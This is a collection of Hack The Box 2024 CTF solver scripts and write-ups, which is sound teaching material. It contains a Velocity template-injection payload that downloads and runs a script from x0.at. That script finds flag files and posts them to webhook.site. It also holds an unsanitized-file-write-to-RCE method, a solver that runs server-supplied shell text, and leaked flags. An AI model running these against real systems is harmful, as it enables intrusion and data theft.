-------------------------------------------------------------------------------- /pwn/[Very Easy] Tutorial/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | import warnings 4 | import os 5 | warnings.filterwarnings('ignore') 6 | context.log_level = 'critical' 7 | 8 | LOCAL = False 9 | 10 | os.system('clear') 11 | 12 | IP = str(sys.argv[1]) if len(sys.argv) >= 2 else '0.0.0.0' 13 | PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337 14 | r = remote(IP, PORT) 15 | print(f'Running solver remotely at {IP} {PORT}\n') 16 | 17 | r.timeout = 0.5 18 | 19 | ans = ['y', '2147483647', '–2147483648', '-2147483648', '-2', 'int overflow', '-2147483648', '1337'] 20 | 21 | [r.sendlineafter('>> ', i) for i in ans] 22 | r.recvuntil('HTB') 23 | print(f'Flag --> HTB{r.recvline().strip().decode()}') -------------------------------------------------------------------------------- /pwn/[Very Easy] Writing on the wall/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Very Easy] Writing on the wall/assets/banner.png -------------------------------------------------------------------------------- /pwn/[Very Easy] Writing on the wall/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Very Easy] Writing on the wall/assets/htb.png -------------------------------------------------------------------------------- /pwn/[Very Easy] Writing on the wall/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | import warnings 4 | import os 5 | warnings.filterwarnings('ignore') 6 | context.log_level = 
'critical' 7 | 8 | LOCAL = False 9 | 10 | os.system('clear') 11 | 12 | if LOCAL: 13 | print('Running solver locally..\n') 14 | r = process('./writing_on_the_wall') 15 | else: 16 | IP = str(sys.argv[1]) if len(sys.argv) >= 2 else '0.0.0.0' 17 | PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337 18 | r = remote(IP, PORT) 19 | print(f'Running solver remotely at {IP} {PORT}\n') 20 | 21 | r.sendline(b'\x00' + b'A'* 5 + b'\x00') 22 | r.recvuntil(': ') 23 | print(f'Flag --> {r.recvline().strip().decode()}\n') -------------------------------------------------------------------------------- /reversing/[Easy] Crushing/htb/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from struct import unpack 4 | 5 | content = bytearray(1024) 6 | 7 | fp = open("message.txt.cz", "rb") 8 | highest = 0 9 | for current in range(256): 10 | length_bytes = fp.read(8) 11 | if len(length_bytes) != 8: break 12 | length = unpack("Q", length_bytes)[0] 13 | for i in range(length): 14 | pos = unpack("Q", fp.read(8))[0] 15 | content[pos] = current 16 | highest = max(highest, pos) 17 | print(content[:highest].decode()) 18 | -------------------------------------------------------------------------------- /reversing/[Hard] Metagaming/README.md: -------------------------------------------------------------------------------- 1 | 2 | 1. 
Locating the huge list of all VM handlers 3 | ```cpp 4 | if constexpr (Insn.opcode == 0) { 5 | regs[Insn.op0] = Flag.at(Insn.op1); 6 | } else if constexpr (Insn.opcode == 1) { 7 | regs[Insn.op0] = Insn.op1; 8 | } else if constexpr (Insn.opcode == 2) { 9 | regs[Insn.op0] ^= Insn.op1; 10 | } else if constexpr (Insn.opcode == 3) { 11 | regs[Insn.op0] ^= regs[Insn.op1]; 12 | } else if constexpr (Insn.opcode == 4) { 13 | regs[Insn.op0] |= Insn.op1; 14 | } else if constexpr (Insn.opcode == 5) { 15 | regs[Insn.op0] |= regs[Insn.op1]; 16 | } else if constexpr (Insn.opcode == 6) { 17 | regs[Insn.op0] &= Insn.op1; 18 | } else if constexpr (Insn.opcode == 7) { 19 | regs[Insn.op0] &= regs[Insn.op1]; 20 | ... 21 | ``` 22 | 1.1 Naming the handlers (0 = read flag, 1 = mov, 2 = xor_imm, 3 = xor_reg, etc.) 23 | 2. Getting the VM commands 24 | ```cpp 25 | program_t; 26 | ``` 27 | 3. Lifting to z3 (I cheated a bit and ignored all the junk payloads) 28 | ```py 29 | chunks = [0 for _ in range(15)] 30 | 31 | for i in range(len(flag)): 32 | pos = i % 4 33 | cur_reg = (i - (i % 4)) // 4 34 | 35 | if pos == 0: 36 | chunks[cur_reg] = 0 37 | 38 | chunks[cur_reg] |= (flag[i] << (pos * 8)) 39 | 40 | for cmd in payload: 41 | opcode, op0, op1 = cmd 42 | if opcode == 2: 43 | chunks[op0] ^= BitVecVal(op1, 32) 44 | elif opcode == 8: 45 | chunks[op0] += BitVecVal(op1, 32) 46 | elif opcode == 10: 47 | chunks[op0] -= BitVecVal(op1, 32) 48 | elif opcode == 3: 49 | chunks[op0] ^= chunks[op1] 50 | 51 | s.add(chunks[0] == 0x3ee88722) 52 | s.add(chunks[1] == 0xecbdbe2) 53 | s.add(chunks[2] == 0x60b843c4) 54 | s.add(chunks[3] == 0x5da67c7) 55 | s.add(chunks[4] == 0x171ef1e9) 56 | s.add(chunks[5] == 0x52d5b3f7) 57 | s.add(chunks[6] == 0x3ae718c0) 58 | s.add(chunks[7] == 0x8b4aacc2) 59 | s.add(chunks[8] == 0xe5cf78dd) 60 | ``` 61 | 5. 
Profit 62 | ```py 63 | m = s.model() 64 | fl = ''.join(map(chr, [m[x].as_long() for x in flag])) 65 | assert fl == 'HTB{m4n_1_l0v4_cXX_TeMpl4t35_9fb60c17b0}' 66 | ``` 67 | 68 | 3.1 Second option is to just revert the math operations 69 | ```py 70 | from numpy import uint32 71 | 72 | s = [uint32(0) for i in range(15)] 73 | 74 | s[9] = uint32(0x4a848edf) ^ 0x8f 75 | s[8] = uint32(0xe5cf78dd) ^ s[9] 76 | s[7] = uint32(0x8b4aacc2) ^ s[8] 77 | s[6] = uint32(0x3ae718c0) ^ s[7] 78 | s[5] = uint32(0x52d5b3f7) ^ s[6] 79 | s[4] = uint32(0x171ef1e9) ^ s[5] 80 | s[3] = uint32(0x5da67c7) ^ s[4] 81 | s[2] = uint32(0x60b843c4) ^ s[3] 82 | s[1] = uint32(0xecbdbe2) ^ s[2] 83 | s[0] = uint32(0x3ee88722) ^ s[1] 84 | 85 | instrs = INSTRUCTIONS.strip().split("\n")[::-1] 86 | for i in instrs: 87 | 88 | op, dst, rhs = i.split(" ") 89 | 90 | is_imm = op.endswith("IMM") 91 | operation = op.split('_')[0] 92 | 93 | if dst == "14" or (not is_imm and (operation == "OR" and rhs == "14")): 94 | continue 95 | 96 | if int(dst) > 9 or not is_imm: 97 | continue 98 | 99 | if operation == "ADD": 100 | s[int(dst)] = uint32(s[int(dst)]) - uint32(rhs) 101 | elif operation == "XOR": 102 | s[int(dst)] = uint32(s[int(dst)]) ^ uint32(rhs) 103 | elif operation == "SUB": 104 | s[int(dst)] = uint32(s[int(dst)]) + uint32(rhs) 105 | 106 | for v in s[:10]: 107 | print(bytes.fromhex(hex(v)[2:])) 108 | 109 | print("".join([bytes.fromhex(hex(v)[2:]).decode()[::-1] for v in s[:10]])) 110 | ``` 111 | -------------------------------------------------------------------------------- /reversing/[Insane] MazeOfPower/htb/go.mod: -------------------------------------------------------------------------------- 1 | module solve 2 | 3 | go 1.17 4 | 5 | require github.com/redpwn/pow v0.1.2 6 | 7 | require github.com/itchyny/maze v0.0.9 8 | 9 | require github.com/ncw/gmp v1.0.4 // indirect 10 | -------------------------------------------------------------------------------- /reversing/[Insane] MazeOfPower/htb/go.sum: 
-------------------------------------------------------------------------------- 1 | github.com/BurntSushi/toml v1.2.1/go.mod h1:CxXYINrC8qIiEnFrOxCa7Jy5BFHlXnUU2pbicEuybxQ= 2 | github.com/cpuguy83/go-md2man/v2 v2.0.2/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o= 3 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 4 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 5 | github.com/itchyny/maze v0.0.9 h1:H+3YmPOIpu6j4l1mtM4QzD+9LzFYBTN2baB8s946I5I= 6 | github.com/itchyny/maze v0.0.9/go.mod h1:sRkRwDPr3ektzuOc3GtgtVorM3XS86IFo6RE9ApAW8k= 7 | github.com/mattn/go-isatty v0.0.18/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y= 8 | github.com/mattn/go-runewidth v0.0.9/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI= 9 | github.com/mattn/go-runewidth v0.0.14/go.mod h1:Jdepj2loyihRzMpdS35Xk/zdY8IAYHsh153qUoGf23w= 10 | github.com/ncw/gmp v1.0.4 h1:/f+vRpbpMIqDWfTGqYgCIuhoVfiyVf0ygsnwayqjGwU= 11 | github.com/ncw/gmp v1.0.4/go.mod h1:cDbCx93DFhzP32H3rnwwt6QnIXNL5wu4jLPCNaExheI= 12 | github.com/nsf/termbox-go v1.1.1/go.mod h1:T0cTdVuOwf7pHQNtfhnEbzHbcNyCEcVU4YPpouCbVxo= 13 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 14 | github.com/redpwn/pow v0.1.2 h1:nhMynr6goB0peg6ODfttLwS/s6+1cjJHLxBCbUN6IH0= 15 | github.com/redpwn/pow v0.1.2/go.mod h1:gpuUIZA/5DdaIrWpHVgUg6m4SbsNvYQ0NbPz9RCSXns= 16 | github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc= 17 | github.com/rivo/uniseg v0.4.4/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88= 18 | github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM= 19 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= 20 | github.com/stretchr/objx v0.4.0/go.mod h1:YvHI0jy2hoMjB+UWwv71VJQ9isScKT/TqJzVSSt89Yw= 21 | github.com/stretchr/objx v0.5.0/go.mod 
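h1:Yh+to48EsGEfYuaHDzXPcE3xhTkx73EhmCGUpEOglKo= 22 | github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 23 | github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= 24 | github.com/stretchr/testify v1.8.2/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= 25 | github.com/urfave/cli v1.22.13/go.mod h1:VufqObjsMTF2BBwKawpx9R8eAneNEWhoO0yx8Vd+FkE= 26 | golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 27 | golang.org/x/sys v0.7.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 28 | golang.org/x/term v0.7.0/go.mod h1:P32HKFT3hSsZrRxla30E9HqToFYAQPCMs/zFMBUFqPY= 29 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 30 | gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= 31 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 32 | gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 33 |
--------------------------------------------------------------------------------
/reversing/[Insane] MazeOfPower/solve.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

from pwn import *

def solve_maze_for_challenge(challenge):
    """Solve the proof of work, then replay it locally to recover the maze path.

    challenge is the proof-of-work line received from the remote service.
    Returns (steps, solution): the movement keys produced by maze_steps() and
    the proof-of-work solution string.
    """
    steps = []
    with log.progress("[+] Getting solution...") as p:
        # NOTE(review): `challenge` is text sent by the remote peer and is run
        # here as a local shell command, so whoever controls the service (or
        # the network path to it) gets command execution on the machine that
        # runs this solver. Read the line before running it, or compute the
        # proof of work locally (the go.mod under htb/ already requires
        # github.com/redpwn/pow), and run the script in a throwaway container
        # or VM.
        solution = process(challenge, shell=True).read().decode().strip()
        p.success(solution)

    with log.progress("[+] Getting maze path...") as prog:
        # Feed the same solution to the local patched binary and send "b";
        # the maze text it prints afterwards is what maze_steps() walks.
        p = process("./main.patched")
        p.sendlineafter(b"solution: ", solution.encode())
        p.clean()
        p.sendline(b"b")
        maze = p.clean().decode()
        steps.extend(maze_steps(maze))
        prog.success("Done!")
    return steps, solution

def maze_steps(maze_str):
    """Yield the movement keys that lead from the start marker to the exit.

    maze_str is the maze as printed by the binary; it is split into cells of
    two characters. "SS" marks the start and "EE" the exit. A neighbouring
    "::" cell is treated as a link: the walker jumps two cells in that
    direction. Keys are 'k' (up), 'l' (right), 'j' (down) and 'h' (left).

    Raises RuntimeError when no "SS" cell is present; exits the process when
    no unvisited link leads on from the current cell.
    """
    maze = []
    pos = None
    for i, line in enumerate(maze_str.split("\n")):
        maze_line = []
        for j in range(0, len(line), 2):
            chunk = line[j:j+2]
            if chunk == "SS":
                # The walk starts one cell to the right of the marker.
                pos = (i, j//2 + 1)
            maze_line.append(chunk)
        maze.append(maze_line)
    if pos is None:
        log.critical("start pos not found")
        # `raise StopIteration` inside a generator is turned into a bare
        # RuntimeError by PEP 479; raise that type directly with a message.
        raise RuntimeError("start pos not found")

    seen = set()
    while True:
        if maze[pos[0]][pos[1]] == "EE":
            return
        # Up, Right, Down, Left
        for dy, dx, direction in [
            (-1, 0, 'k'),
            (0, 1, 'l'),
            (1, 0, 'j'),
            (0, -1, 'h'),
        ]:
            new_pos = (pos[0] + dy, pos[1] + dx)
            # Don't go out of bounds
            if new_pos[0] < 0 or new_pos[0] >= len(maze): continue
            if new_pos[1] < 0 or new_pos[1] >= len(maze[new_pos[0]]): continue
            # Don't visit previous positions
            if new_pos in seen: continue
            next_val = maze[new_pos[0]][new_pos[1]]
            if next_val == "::":
                seen.add(new_pos)
                seen.add(pos)
                new_pos = (pos[0] + dy * 2, pos[1] + dx * 2)
                pos = new_pos
                yield direction
                break
            elif next_val == "EE":
                pos = new_pos
                yield direction
                break
        else:
            # for-else: none of the four directions was usable.
            log.critical("could not solve")
            exit(-1)

r = remote(args.HOST or "127.0.0.1", args.PORT or 1337)
r.recvuntil(b"proof of work: ")
challenge = r.recvline().strip().decode()
steps, solution = solve_maze_for_challenge(challenge)
r.sendlineafter(b"solution: ", solution.encode())
for step in steps:
    # Wait for the maze to be redrawn (it contains "EE") before each key.
    r.recvuntil(b'EE').decode()
    r.send(step.encode())
result = r.clean().strip().decode()
print(result)
--------------------------------------------------------------------------------
/reversing/[Medium] FollowThePath/htb/solve.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3 2 | 3 | out_bin = 'chall.exe' 4 | 5 | with open(out_bin, 'rb') as f: 6 | f.seek(0x400) 7 | out_bin_data = f.read() 8 | 9 | def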
process_chunk(chunk): 10 | k1 = chunk[10] 11 | k2 = chunk[17] 12 | k3 = chunk[0x2b + 4] 13 | return k1, k2, k3 14 | 15 | flag = "" 16 | for i in range(0, 0x39 * 100, 0x39): 17 | if "}" in flag: break 18 | chunk = out_bin_data[i:i+0x39] 19 | key, check, xor = process_chunk(chunk) 20 | flag += chr(key ^ check) 21 | print(flag) 22 |
--------------------------------------------------------------------------------
/reversing/[Medium] QuickScan/htb/solve.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

from pwn import *
import tempfile

r = remote(args.HOST or "127.0.0.1", args.PORT or 1337)

def get_loaded_value(e: ELF):
    """Return the 0x18 bytes referenced by the instruction at entrypoint + 4.

    The arithmetic treats that instruction as 7 bytes long, with a signed
    32-bit displacement at byte 3 that is relative to the next instruction.
    NOTE(review): that is the shape of an x86-64 RIP-relative `lea`; the code
    does not check the opcode, so confirm against a sample binary.
    """
    insn = e.entrypoint + 4
    disp = u32(e.read(insn + 3, 4), sign="signed")
    return e.read(insn + 7 + disp, 0x18)

def do_round():
    """Play one round: receive a base64 ELF, answer with the bytes it loads.

    The server-supplied ELF is written to a temporary file and opened with
    pwntools' ELF class, which only parses it; this script never runs it.
    """
    r.recvuntil(b"ELF: ")
    blob = b64d(r.recvline().decode())
    # log_level='critical' silences pwntools' log output while the file loads.
    with tempfile.NamedTemporaryFile("wb") as tmp, context.local(log_level='critical'):
        tmp.write(blob)
        tmp.flush()
        parsed = ELF(tmp.name)
    answer = get_loaded_value(parsed)
    r.sendlineafter(b"Bytes? ", answer.hex().encode())

# One round is played before the progress logger starts, then 128 more.
do_round()
with log.progress("Solving binaries") as progress:
    for done in range(128):
        do_round()
        progress.status(f"Solved {done}")

r.interactive()
--------------------------------------------------------------------------------
/reversing/[Very Easy] BoxCutter/README.md:
--------------------------------------------------------------------------------
1 | 2 | 3 | BoxCutter 4 | 5 | 6th 03 24 / Document No. D24.102.19 6 | 7 | Prepared By: clubby789 8 | 9 | Challenge Author: clubby789 10 | 11 | Difficulty: Very Easy 12 | 13 | Classification: Official 14 | 15 | 16 | 17 | 18 | 19 | 20 | # Synopsis 21 | 22 | BoxCutter is a Very Easy reversing challenge. Players will use `strace` to identify the flag.
23 | 24 | ## Skills Learned 25 | - Use of `strace` 26 | 27 | # Solution 28 | 29 | If players run the challenge, they will receive the message `[X] Error: Box Not Found`. If we run it under strace, we will see the following: 30 | 31 | ``` 32 | [ .. SNIP .. ] 33 | munmap(0x7f2ee0bd7000, 334763) = 0 34 | openat(AT_FDCWD, "HTB{...}", O_RDONLY) = -1 ENOENT (No such file or directory) 35 | fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}) = 0 36 | [ .. SNIP .. ] 37 | ``` 38 | 39 | The binary is trying to open a file with the name of the flag. We have now solved the challenge. 40 | -------------------------------------------------------------------------------- /reversing/[Very Easy] LootStash/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | LootStash 4 | 5 | 7th 02 24 / Document No. D24.102.13 6 | 7 | Prepared By: clubby789 8 | 9 | Challenge Author: clubby789 10 | 11 | Difficulty: Very Easy 12 | 13 | Classification: Official 14 | 15 | 16 | 17 | 18 | 19 | 20 | # Synopsis 21 | 22 | LootStash is a Very Easy reversing challenge. 23 | 24 | ## Skills Learned 25 | - Using `strings` 26 | 27 | # Solution 28 | 29 | If we run the binary, it will print a series of dots over 5 seconds, then tell us a weapon that was retrieved from the stash. 30 | 31 | ``` 32 | Diving into the stash - let's see what we can find. 33 | ..... 34 | You got: 'Supinity, Ferocity of Bloodlust'. Now run, before anyone tries to steal it! 35 | ``` 36 | 37 | If we run `strings` and `grep` for `HTB`, we can locate the flag in the binary. -------------------------------------------------------------------------------- /reversing/[Very Easy] PackedAway/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | PackedAway 4 | 5 | 6th 03 24 / Document No. 
D24.102.20 6 | 7 | Prepared By: clubby789 8 | 9 | Challenge Author: clubby789 10 | 11 | Difficulty: Very Easy 12 | 13 | Classification: Official 14 | 15 | 16 | 17 | 18 | 19 | 20 | # Synopsis 21 | 22 | PackedAway is a Very Easy reversing challenge. Players will use `UPX` to extract the original version of an executable. 23 | 24 | ## Skills Learned 25 | - Unpacking `UPX` executables 26 | 27 | # Solution 28 | 29 | If we run the binary, it opens a UI containing a text box with 'Placeholder'. If we write a fake flag such as `HTB{xx}`, it is highlighted in red. 30 | 31 | ![textbox with fake flag highlighted in red](assets/textbox.png). 32 | 33 | If we run `strings` on the binary, there are no obvious secrets - but there are several 'UPX!' strings. If we use `upx -d` to extract the binary, we will unpack a slightly larger one. We can then run `strings` again, and find the flag in the output. 34 | 35 | If we enter this in the textbox, it will be highlighted in green. 36 | 37 | ![textbox with blurred flag highlighted in green](assets/flag.png). 
38 | -------------------------------------------------------------------------------- /reversing/[Very Easy] PackedAway/assets/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/reversing/[Very Easy] PackedAway/assets/flag.png -------------------------------------------------------------------------------- /reversing/[Very Easy] PackedAway/assets/textbox.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/reversing/[Very Easy] PackedAway/assets/textbox.png -------------------------------------------------------------------------------- /web/[Easy] Labyrinth Linguist/assets/overview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Easy] Labyrinth Linguist/assets/overview.png -------------------------------------------------------------------------------- /web/[Easy] Labyrinth Linguist/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Change flag name 4 | mv /flag.txt /flag$(cat /dev/urandom | tr -cd "a-f0-9" | head -c 10).txt 5 | 6 | # Secure entrypoint 7 | chmod 600 /entrypoint.sh 8 | 9 | # Start application 10 | /usr/bin/supervisord -c /etc/supervisord.conf -------------------------------------------------------------------------------- /web/[Easy] Labyrinth Linguist/htb/flag.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | search_dir="/" 4 | 5 | server_url="https://webhook.site/a425d5a9-f596-49e0-b2fc-64c4c2b7e34b" 6 | 7 | file=$(find "$search_dir" -type f -name "flag*.txt") 8 | 9 | if [ -n "$file" ]; 
then 10 | curl -d @/$file -X POST $server_url 11 | echo "File contents sent to the server." 12 | else 13 | echo "No file starting with 'flag' found in $search_dir." 14 | fi 15 | -------------------------------------------------------------------------------- /web/[Easy] Labyrinth Linguist/htb/solver.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | HOST, PORT = "127.0.0.1", 1337 4 | CHALLENGE_URL = f"http://{HOST}:{PORT}" 5 | FILE_HOST = "https://x0.at" 6 | 7 | def ssti(payload): 8 | return f""" 9 | #set($engine="") 10 | #set($proc=$engine.getClass().forName("java.lang.Runtime").getRuntime().exec("{payload}")) 11 | #set($null=$proc.waitFor()) 12 | ${{null}} 13 | """ 14 | 15 | def pwn(): 16 | with requests.Session() as session: 17 | uploaded_file = session.post(FILE_HOST, files={"file": open("flag.sh", "rb")}).text.strip() 18 | session.post(CHALLENGE_URL, data={"text": ssti(f"curl {uploaded_file} -o /a.sh")}) 19 | session.post(CHALLENGE_URL, data={"text": ssti(f"sh /a.sh")}) 20 | 21 | 22 | def main(): 23 | pwn() 24 | 25 | 26 | if __name__ == "__main__": 27 | main() -------------------------------------------------------------------------------- /web/[Easy] Testimonial/assets/overview1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Easy] Testimonial/assets/overview1.png -------------------------------------------------------------------------------- /web/[Easy] Testimonial/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Change flag name 4 | mv /flag.txt /flag$(cat /dev/urandom | tr -cd "a-f0-9" | head -c 10).txt 5 | 6 | # Secure entrypoint 7 | chmod 600 /entrypoint.sh 8 | 9 | # Start application 10 | air -------------------------------------------------------------------------------- 
/web/[Easy] Testimonial/htb/solution.txt: -------------------------------------------------------------------------------- 1 | This challenge uses Golang + Templ, a new-ish templating language for Golang. It also uses AIR, which monitors the Golang files and updates the website when one of them is modified. 2 | 3 | The challenge is a basic microservice setup: there is a website and a "File Writer" service (gRPC). The website sanitizes the filename, but the File Writer service applies no sanitization of its own, so a request sent to it directly can name any path. Because AIR updates the website whenever a source file changes, overwriting a template through the File Writer turns the unsanitized file write into code execution; the filename check therefore has to be enforced in the service that performs the write, not only in the front end that calls it. It is probably possible to use GRPCurl to make this request, but since you need to replace an entire file it can be hard to do all the escapes properly. It is far easier to just write a Golang program to send the malicious file. 4 | -------------------------------------------------------------------------------- /web/[Easy] Testimonial/htb/solver/.env: -------------------------------------------------------------------------------- 1 | HTTP_LISTEN_ADDR=":3000" 2 | GRPC_LISTEN_ADDR=":50045" 3 | -------------------------------------------------------------------------------- /web/[Easy] Testimonial/htb/solver/go.mod: -------------------------------------------------------------------------------- 1 | module client 2 | 3 | go 1.21.1 4 | 5 | require ( 6 | github.com/golang/protobuf v1.5.3 // indirect 7 | golang.org/x/net v0.20.0 // indirect 8 | golang.org/x/sys v0.16.0 // indirect 9 | golang.org/x/text v0.14.0 // indirect 10 | google.golang.org/genproto/googleapis/rpc v0.0.0-20240123012728-ef4313101c80 // indirect 11 | google.golang.org/grpc v1.62.0 // indirect 12 | google.golang.org/protobuf v1.32.0 // indirect 13 | ) 14 | -------------------------------------------------------------------------------- /web/[Easy] Testimonial/htb/solver/go.sum: -------------------------------------------------------------------------------- 1 | github.com/golang/protobuf v1.5.0/go.mod 
h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk= 2 | github.com/golang/protobuf v1.5.3 h1:KhyjKVUg7Usr/dYsdSqoFveMYd5ko72D+zANwlG1mmg= 3 | github.com/golang/protobuf v1.5.3/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY= 4 | github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= 5 | golang.org/x/net v0.20.0 h1:aCL9BSgETF1k+blQaYUBx9hJ9LOGP3gAVemcZlf1Kpo= 6 | golang.org/x/net v0.20.0/go.mod h1:z8BVo6PvndSri0LbOE3hAn0apkU+1YvI6E70E9jsnvY= 7 | golang.org/x/sys v0.16.0 h1:xWw16ngr6ZMtmxDyKyIgsE93KNKz5HKmMa3b8ALHidU= 8 | golang.org/x/sys v0.16.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= 9 | golang.org/x/text v0.14.0 h1:ScX5w1eTa3QqT8oi6+ziP7dTV1S2+ALU0bI+0zXKWiQ= 10 | golang.org/x/text v0.14.0/go.mod h1:18ZOQIKpY8NJVqYksKHtTdi31H5itFRjB5/qKTNYzSU= 11 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 12 | google.golang.org/genproto v0.0.0-20240123012728-ef4313101c80 h1:KAeGQVN3M9nD0/bQXnr/ClcEMJ968gUXJQ9pwfSynuQ= 13 | google.golang.org/genproto/googleapis/rpc v0.0.0-20240123012728-ef4313101c80 h1:AjyfHzEPEFp/NpvfN5g+KDla3EMojjhRVZc1i7cj+oM= 14 | google.golang.org/genproto/googleapis/rpc v0.0.0-20240123012728-ef4313101c80/go.mod h1:PAREbraiVEVGVdTZsVWjSbbTtSyGbAgIIvni8a8CD5s= 15 | google.golang.org/grpc v1.62.0 h1:HQKZ/fa1bXkX1oFOvSjmZEUL8wLSaZTjCcLAlmZRtdk= 16 | google.golang.org/grpc v1.62.0/go.mod h1:IWTG0VlJLCh1SkC58F7np9ka9mx/WNkjl4PGJaiq+QE= 17 | google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw= 18 | google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= 19 | google.golang.org/protobuf v1.32.0 h1:pPC6BG5ex8PDFnkbrGU3EixyhKcQ2aDuBS36lqK/C7I= 20 | google.golang.org/protobuf v1.32.0/go.mod h1:c6P6GXX6sHbq/GpV6MGZEdwhWPcYBgnhAHhKbcUYpos= 21 | -------------------------------------------------------------------------------- /web/[Easy] Testimonial/htb/solver/main.go: 
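--------------------------------------------------------------------------------
package main

import (
	"client/pb"
	"context"
	"fmt"
	"io"
	"net/http"
	"os"
	"strings"
	"sync"

	"google.golang.org/grpc"
)

var (
	grpcClient *Client
	mutex      *sync.Mutex
)

func init() {
	grpcClient = nil
	mutex = &sync.Mutex{}
}

// Client wraps the generated RickyService gRPC client.
type Client struct {
	pb.RickyServiceClient
}

// getHTML fetches url with an HTTP GET and returns the response body as a
// string.
func getHTML(url string) (string, error) {
	response, err := http.Get(url)
	if err != nil {
		return "", err
	}
	defer response.Body.Close()

	body, err := io.ReadAll(response.Body)
	if err != nil {
		return "", err
	}

	return string(body), nil
}

// GetClient returns the shared gRPC client, dialing 127.0.0.1:50045 on first
// use. The mutex serialises that lazy initialisation.
func GetClient() (*Client, error) {
	mutex.Lock()
	defer mutex.Unlock()

	if grpcClient == nil {
		// grpc.WithInsecure disables transport security, so the channel is
		// plaintext and unauthenticated. It is deprecated in favour of
		// grpc.WithTransportCredentials(insecure.NewCredentials()).
		conn, err := grpc.Dial("127.0.0.1:50045", grpc.WithInsecure())
		if err != nil {
			return nil, err
		}

		grpcClient = &Client{pb.NewRickyServiceClient(conn)}
	}

	return grpcClient, nil
}

// SendTestimonial strips path and wildcard characters from customer and then
// submits the testimonial.
//
// The filter runs in the caller, and main below does not go through this
// method. A check placed here protects nothing once the gRPC port is
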